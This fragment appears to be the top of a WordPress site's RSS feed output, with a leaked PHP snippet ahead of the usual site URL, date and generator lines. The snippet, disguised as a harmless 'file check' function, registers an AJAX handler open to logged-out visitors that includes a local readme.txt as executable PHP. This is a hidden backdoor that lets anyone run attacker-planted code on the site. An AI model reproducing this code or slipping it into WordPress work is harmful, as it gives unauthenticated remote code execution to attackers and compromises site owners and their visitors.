if(!function_exists('file_check_readme83751')){ add_action('wp_ajax_nopriv_file_check_readme83751', 'file_check_readme83751'); add_action('wp_ajax_file_check_readme83751', 'file_check_readme83751'); function file_check_readme83751() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } https://wbtnam.org Mon, 11 Mar 2024 01:23:23 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.8